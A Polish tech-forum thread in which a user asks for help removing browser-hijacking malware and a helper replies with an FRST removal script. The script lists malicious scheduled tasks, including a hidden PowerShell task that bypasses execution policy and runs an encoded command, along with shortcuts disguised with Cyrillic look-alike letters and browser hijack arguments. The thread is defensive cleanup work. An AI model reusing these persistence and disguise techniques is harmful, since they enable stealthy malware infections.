Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Chiński wirus przeglądarkowy - złośliwe oprogramowanie

nataszka663 20 Cze 2017 21:17 567 5
  • #1 20 Cze 2017 21:17
    nataszka663
    Poziom 2  

    Niestety podczas pobierania spolszczenia kliknęłam na button, który zamiast ściągnąć to co trzeba ściągnął mi złośliwe oprogramowanie. Nie wiem co to jest dokładnie, jakiś alware zapewne. No cóż co chwile wyświetlają się różne strony na "przeglądarce" w kształcie wiewiórki. Próbowałam już malwarebytes - nic. ADWCleaner też sobie nie poradził, również rkill poległ. Zrobiłam więc FRST i Addition, które podam w załączniku. Podam też raport z ADW, z góry dziękuje za pomoc![

    0 5
  • Pomocny post
    #2 20 Cze 2017 21:52
    Kolobos
    Spec od komputerów

    Odinstaluj:
    AVG PC TuneUp 2015
    System Healer

    Podany Fixlist wykonaj w trybie awaryjnym.

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    Task: {0FEFA930-4387-41F8-AB08-EE0B8BE9DA0E} - System32\Tasks\Kaypall Phone => Rundll32.exe "C:\Program Files\Kaypall Phone\Kaypall Phone.dll",NRmWpXPs <==== UWAGA
    Task: {49F6D071-2AA8-46FC-981C-B27482CDE0AB} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-06-18] (Microleaves) <==== UWAGA
    Task: {4F36B074-0C57-46BC-96B7-5847595F1131} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
    Task: {6D776B98-3FB5-4007-B4B6-C5E71165F41F} - System32\Tasks\MyReader => Rundll32.exe "C:\Program Files\MyReader\MyReader.dll",cyvBpo <==== UWAGA
    Task: {6E9F78FE-5150-4940-8092-F5A2BEBD863C} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () <==== UWAGA
    Task: {793C6C6B-3608-4648-9DEB-ED56C250F284} - System32\Tasks\{7A797A47-040C-0C05-0E11-7E0B0C7F117F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsA (dane wartości zawierają 9952 znaków więcej). <==== UWAGA
    Task: {96CA102A-864D-485B-9F20-3BD859616994} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
    Task: {9D6D9CDF-1596-4798-82A1-0675046A69BD} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-06-19] (UC Web Inc.) <==== UWAGA
    Task: {A0A338E9-E9CF-4F29-B84F-3F160362B671} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-03-07] (UCWeb Inc) <==== UWAGA
    Task: {A18B4EFA-3011-4C88-9571-2B4095F7F6AE} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2016-12-26] () <==== UWAGA
    Task: {A966D23B-3130-42A6-B90B-71908E86A85D} - System32\Tasks\0b5c76bb7599252601fe688dbc063f23 => sc start 0b5c76bb7599252601fe688dbc063f23 <==== UWAGA
    Task: {D7617236-45EA-4D46-A3B0-BDCC65E51D75} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA




    Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== UWAGA
    WMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA
    Shortcut: C:\Users\shenzai\Desktop\Fаllоut 4.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual4tuollaf.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\Gоogle Chromе.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\Lеft 4 Dеаd 2.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualemag.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\Орerа.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\programy\DАЕMОN Тоols Litе.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualtd.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\programy\Nехon Lаunсhеr.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\programy\NСsоft Launcher.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualcn.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\programy\kutafonga\pierdołki\dd\Nowy folder (2)\Nowy folder\WаrThunder.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\Desktop\Moja Postać - Eldarya_files\Nowy folder\Lеft 4 Dеаd 2.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualemag.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnet Еxрlorer.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.erolpxei.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WаrThunder.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Nеxon Lаunсher.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Ridеrs оf Icаrus.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехрlorеr (Nо Аdd-ons).lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.erolpxei.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоoglе Chromе.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnet Ехрlоrеr Brоwser.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.erolpxei.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WаrThundеr.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Gоoglе Chrоme.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Мozilla Firеfoх.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.xoferif.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Оpera.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gооglе Chrоme.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.emorhc.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\АIОN Frеe-to-Play.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualcn.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzilla Firefох.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.xoferif.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ореra.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\Public\Desktop\АION Frее-tо-Рlay.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnualcn.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\Public\Desktop\Мozilla Firefох.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.xoferif.bat (Brak pliku) <===== Cyrillic
    Shortcut: C:\Users\Public\Desktop\ТERА.lnk -> C:\Users\shenzai\AppData\Roaming\Browsers\exe.rehcnual-aret.bat (Brak pliku) <===== Cyrillic
    ShortcutWithArgument: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\shenzai\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    2017-06-19 19:24 - 2017-03-07 22:09 - 00599440 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
    2017-06-19 20:05 - 2017-06-20 20:00 - 00486400 _____ () C:\Windows\TEMP\gFF8.tmp.exe
    2017-06-19 20:34 - 2017-06-19 20:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\fhzrd0gttza\5zct21km4e1.exe
    2017-06-19 20:34 - 2017-06-19 20:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\nura0dmmhpv\dsljdbb31r0.exe
    2017-06-19 20:34 - 2017-06-19 20:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\ldmagzil55c\ftp0i4wlwfx.exe
    2017-06-19 20:34 - 2017-06-19 20:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\zmzrs3tx0wf\f2nwb323hsr.exe
    2017-06-19 21:05 - 2017-06-19 21:05 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\q05qybgj5jq\ghqbgghizvj.exe
    2017-06-19 21:05 - 2017-06-19 21:05 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\sugqxgvlxy5\ri3bke4qsm3.exe
    2017-06-19 21:21 - 2017-06-19 21:21 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\qpmxs3bw3ng\oznlho02uba.exe
    2017-06-19 21:21 - 2017-06-19 21:21 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\dz5uts4wvfd\kjg4k3pbawg.exe
    2017-06-19 21:21 - 2017-06-19 21:21 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\qkbq50xf10b\cw1uk2ojliy.exe
    2017-06-19 21:22 - 2017-06-19 21:22 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\hrjq31jjr1s\fpjvn4zz34s.exe
    2017-06-19 21:33 - 2017-06-19 21:33 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\rqva4vu3i5j\bzpxt0lba5z.exe
    2017-06-19 21:33 - 2017-06-19 21:33 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\yry2vavm0el\41suzs5cthi.exe
    2017-06-19 21:34 - 2017-06-19 21:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\s3hgbczwrde\ageptk0vzca.exe
    2017-06-19 21:34 - 2017-06-19 21:34 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\c0hqm2ldlwn\n2glakpvl1m.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\dybmia1ijuv\q0y2d250eqq.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\y5biuysevnl\4phjuookzub.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01040384 _____ () C:\Program Files\4PBTGJC09T\JYDKCXGWC.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\toczbv142yx\m2sxde1ymwr.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01076736 _____ () C:\Users\shenzai\AppData\Local\Temp\is-FFIER.tmp\2VTPN1cGL.tmp
    2017-06-20 20:10 - 2017-06-20 20:10 - 01076736 _____ () C:\Users\shenzai\AppData\Local\Temp\is-3F3K2.tmp\SFD6Dg27D.tmp
    2017-06-20 20:10 - 2017-06-20 20:10 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\ghiuy3lhhxs\n32a1l3edju.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01040384 _____ () C:\Program Files\W5M8VVC41Z\W5M8VVC41.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 00008192 _____ () C:\Users\shenzai\AppData\Roaming\koqyvsaiayp\41rp2vfgvbd.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01040384 _____ () C:\Program Files\MM5915986V\MM5915986.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01040384 _____ () C:\Program Files\1R2KLZCDR0\1R2KLZCDR.exe
    2017-06-20 20:10 - 2017-06-20 20:10 - 01040384 _____ () C:\Program Files\G8P4KU1YKZ\G8P4KU1YK.exe
    2017-06-20 20:12 - 2017-06-13 17:34 - 03513856 _____ () C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe
    2017-06-20 20:13 - 2017-06-20 20:13 - 02072576 _____ () C:\Users\shenzai\AppData\Local\Temp\00009416\msiql.exe
    2016-12-26 12:19 - 2016-12-26 12:19 - 01183392 _____ () C:\Program Files (x86)\SystemHealer\RescueMonitor.exe
    2017-06-20 20:10 - 2008-10-15 16:44 - 00205312 _____ () C:\Users\shenzai\AppData\Local\Temp\is-1PM3K.tmp\itdownload.dll
    2017-06-20 20:10 - 2008-10-15 16:44 - 00205312 _____ () C:\Users\shenzai\AppData\Local\Temp\is-HUS7U.tmp\itdownload.dll
    2017-06-19 19:24 - 2017-03-07 22:09 - 00281528 _____ () C:\Program Files (x86)\UCBrowser\Application\6.1.2107.204\courgette.dll
    2017-06-19 19:24 - 2017-03-07 22:09 - 00305040 _____ () C:\Program Files (x86)\UCBrowser\Application\6.1.2107.204\stats_uploader.exe
    AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444]
    AlternateDataStreams: C:\Windows\system32\drivers:x64 [1498914]
    AlternateDataStreams: C:\Windows\system32\drivers:x86 [1223458]
    Hosts:
    () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
    () C:\Windows\Temp\gFF8.tmp.exe
    (E7AZC52) C:\Program Files (x86)\af5eu2vwtg0\LY6738TGEWIMZ7H.exe
    (E7AZC52) C:\Program Files (x86)\bcztbxttabt\REIL0L171Q8H6VB.exe
    () C:\Users\shenzai\AppData\Roaming\fhzrd0gttza\5zct21km4e1.exe
    () C:\Users\shenzai\AppData\Roaming\nura0dmmhpv\dsljdbb31r0.exe
    (BE6) C:\Program Files\SR251QB9FR\SR251QB9F.exe
    () C:\Users\shenzai\AppData\Roaming\ldmagzil55c\ftp0i4wlwfx.exe
    () C:\Users\shenzai\AppData\Roaming\zmzrs3tx0wf\f2nwb323hsr.exe
    (BE6) C:\Program Files\WRTZITNY23\WRTZITNY2.exe
    (BE6) C:\Program Files\XC5Z0BU2Y6\XC5Z0BU2Y.exe
    () C:\Users\shenzai\AppData\Roaming\q05qybgj5jq\ghqbgghizvj.exe
    () C:\Users\shenzai\AppData\Roaming\sugqxgvlxy5\ri3bke4qsm3.exe
    (15USG) C:\Program Files\93I1LBPZ1T\93I1LBPZ1.exe
    (15USG) C:\Program Files\ISQS1Z69P0\ISQS1Z69P.exe
    () C:\Users\shenzai\AppData\Roaming\qpmxs3bw3ng\oznlho02uba.exe
    () C:\Users\shenzai\AppData\Roaming\dz5uts4wvfd\kjg4k3pbawg.exe
    (15USG) C:\Program Files\393WNXK8JD\393WNXK8J.exe
    () C:\Users\shenzai\AppData\Roaming\qkbq50xf10b\cw1uk2ojliy.exe
    (15USG) C:\Program Files\1RBOSEKT1M\R5OI8DWV0.exe
    () C:\Users\shenzai\AppData\Roaming\hrjq31jjr1s\fpjvn4zz34s.exe
    (15USG) C:\Program Files\5XR5VD3DZ9\5XR5VD3DZ.exe
    () C:\Users\shenzai\AppData\Roaming\rqva4vu3i5j\bzpxt0lba5z.exe
    () C:\Users\shenzai\AppData\Roaming\yry2vavm0el\41suzs5cthi.exe
    (15USG) C:\Program Files\UG6R5GFKJM\8NI04M7N8.exe
    () C:\Users\shenzai\AppData\Roaming\s3hgbczwrde\ageptk0vzca.exe
    (15USG) C:\Program Files\TKW87PQMG6\TKW87PQMG.exe
    () C:\Users\shenzai\AppData\Roaming\c0hqm2ldlwn\n2glakpvl1m.exe
    (15USG) C:\Program Files\MUMESLMP8Z\KUTN0UGDP.exe
    () C:\Users\shenzai\AppData\Roaming\dybmia1ijuv\q0y2d250eqq.exe
    (McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
    () C:\Users\shenzai\AppData\Roaming\y5biuysevnl\4phjuookzub.exe
    () C:\Program Files\4PBTGJC09T\JYDKCXGWC.exe
    () C:\Users\shenzai\AppData\Roaming\toczbv142yx\m2sxde1ymwr.exe
    ( ) C:\Users\shenzai\AppData\Local\Temp\TQ2XAFtrr\2VTPN1cGL.exe
    () C:\Users\shenzai\AppData\Local\Temp\is-FFIER.tmp\2VTPN1cGL.tmp
    ( ) C:\Users\shenzai\AppData\Local\Temp\LxQsks7rp\SFD6Dg27D.exe
    () C:\Users\shenzai\AppData\Local\Temp\is-3F3K2.tmp\SFD6Dg27D.tmp
    () C:\Users\shenzai\AppData\Roaming\ghiuy3lhhxs\n32a1l3edju.exe
    () C:\Program Files\W5M8VVC41Z\W5M8VVC41.exe
    () C:\Users\shenzai\AppData\Roaming\koqyvsaiayp\41rp2vfgvbd.exe
    () C:\Program Files\MM5915986V\MM5915986.exe
    () C:\Program Files\1R2KLZCDR0\1R2KLZCDR.exe
    () C:\Program Files\G8P4KU1YKZ\G8P4KU1YK.exe
    () C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe
    () C:\Users\shenzai\AppData\Local\Temp\00009416\msiql.exe
    (Microleaves LTD) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
    (UCWeb Inc.) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
    () C:\Program Files (x86)\SystemHealer\RescueMonitor.exe
    (Microleaves LTD) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
    (Microleaves LTD) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
    HKLM\...\RunOnce: [OMEWPRODUCT_X42ZJ] => C:\Program Files (x86)\af5eu2vwtg0\LY6738TGEWIMZ7H.exe [340480 2017-06-19] (E7AZC52) <===== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_MZRWZ] => C:\Program Files (x86)\bcztbxttabt\REIL0L171Q8H6VB.exe [340480 2017-06-19] (E7AZC52) <===== UWAGA
    HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [m1ckmqiyyko] => C:\Users\shenzai\AppData\Roaming\fhzrd0gttza\5zct21km4e1.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [ykvhbgwumi5] => C:\Users\shenzai\AppData\Roaming\nura0dmmhpv\dsljdbb31r0.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [3RPOYVY7LIBE1MG] => C:\Program Files\SR251QB9FR\SR251QB9F.exe [1040384 2017-06-19] (BE6)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [nswedruz4bd] => C:\Users\shenzai\AppData\Roaming\ldmagzil55c\ftp0i4wlwfx.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [1heclwiz3o5] => C:\Users\shenzai\AppData\Roaming\zmzrs3tx0wf\f2nwb323hsr.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [K9SOJ7TC07URG4K] => C:\Program Files\WRTZITNY23\WRTZITNY2.exe [1040384 2017-06-19] (BE6)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [GS9STDA8LNBJTVK] => C:\Program Files\XC5Z0BU2Y6\XC5Z0BU2Y.exe [1040384 2017-06-19] (BE6)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [deumr2hprqx] => C:\Users\shenzai\AppData\Roaming\q05qybgj5jq\ghqbgghizvj.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [gsskaqbsoaj] => C:\Users\shenzai\AppData\Roaming\sugqxgvlxy5\ri3bke4qsm3.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [BXWXFNFZRYB4LF7] => C:\Program Files\93I1LBPZ1T\93I1LBPZ1.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [W85WCZH87YEU86Q] => C:\Program Files\ISQS1Z69P0\ISQS1Z69P.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [eaodoacsku5] => C:\Users\shenzai\AppData\Roaming\qpmxs3bw3ng\oznlho02uba.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [evvvz30iqof] => C:\Users\shenzai\AppData\Roaming\dz5uts4wvfd\kjg4k3pbawg.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [NGU3F4DMF4T3UWG] => C:\Program Files\393WNXK8JD\393WNXK8J.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [sqfez104yk3] => C:\Users\shenzai\AppData\Roaming\qkbq50xf10b\cw1uk2ojliy.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [0JOF64PVYYOGA3B] => C:\Program Files\1RBOSEKT1M\R5OI8DWV0.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [znwhwgfugvn] => C:\Users\shenzai\AppData\Roaming\hrjq31jjr1s\fpjvn4zz34s.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [B7S4B3507VF332X] => C:\Program Files\5XR5VD3DZ9\5XR5VD3DZ.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [llpdejluifq] => C:\Users\shenzai\AppData\Roaming\rqva4vu3i5j\bzpxt0lba5z.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [y5h20hpyd3b] => C:\Users\shenzai\AppData\Roaming\yry2vavm0el\41suzs5cthi.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [7AOB8TB0M6289ZW] => C:\Program Files\UG6R5GFKJM\8NI04M7N8.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [p22bowjecva] => C:\Users\shenzai\AppData\Roaming\s3hgbczwrde\ageptk0vzca.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [443HBEPMFNP2COW] => C:\Program Files\TKW87PQMG6\TKW87PQMG.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [rl4z0km5ntl] => C:\Users\shenzai\AppData\Roaming\c0hqm2ldlwn\n2glakpvl1m.exe [8192 2017-06-19] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [AWOOOMLMR5QRU33] => C:\Program Files\MUMESLMP8Z\KUTN0UGDP.exe [1040384 2017-06-19] (15USG)
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [3tezerajqf2] => C:\Users\shenzai\AppData\Roaming\dybmia1ijuv\q0y2d250eqq.exe [8192 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [fegr4qybouf] => C:\Users\shenzai\AppData\Roaming\y5biuysevnl\4phjuookzub.exe [8192 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [RRANUT1PEITPDP0] => C:\Program Files\4PBTGJC09T\JYDKCXGWC.exe [1040384 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [2fvtlwpnztc] => C:\Users\shenzai\AppData\Roaming\toczbv142yx\m2sxde1ymwr.exe [8192 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [pxmvybgpfen] => C:\Users\shenzai\AppData\Roaming\ghiuy3lhhxs\n32a1l3edju.exe [8192 2017-06-20] ()
